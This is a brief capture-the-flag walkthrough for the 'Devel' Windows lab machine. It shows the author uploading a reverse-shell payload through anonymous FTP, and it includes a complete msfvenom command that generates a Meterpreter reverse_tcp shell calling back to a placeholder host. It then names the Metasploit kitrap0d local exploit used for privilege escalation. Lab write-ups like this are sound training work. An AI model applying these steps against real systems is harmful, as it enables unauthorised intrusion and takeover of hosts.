Machine - Easy Windows - Devel
IP 10.10.10.5
Contents
Tools
- Nmap
- ftp
- Metasploit
Enumeration
- Nmap shows port 21 and 80 is open.
Exploitation
- FTP anynymous login was enabled. So, exploited it with put shell.aspxto upload msfvenom shell. msfvenom command used,msfvenom -p windows/meterpreter/reverse_tcp LHOST=<LAB IP> LPORT=<PORT> -f aspx > shell.aspx
- Then used /multi/handlerto get reverse tcp connection from the shell on metasploit as userIIS APPPOOL\Web.
Priviledge Escalation
- Used local_exploit_suggestermodule for this.
- After trying some suggested exploit exploit/windows/local/ms10_015_kitrap0dworked. The flags can now be obtained fromc:\Users\babis\Desktop\user.txt.txtandc:\Users\Administrator\Desktop\root.txt.txt
Author: Zishan Ahamed Thandar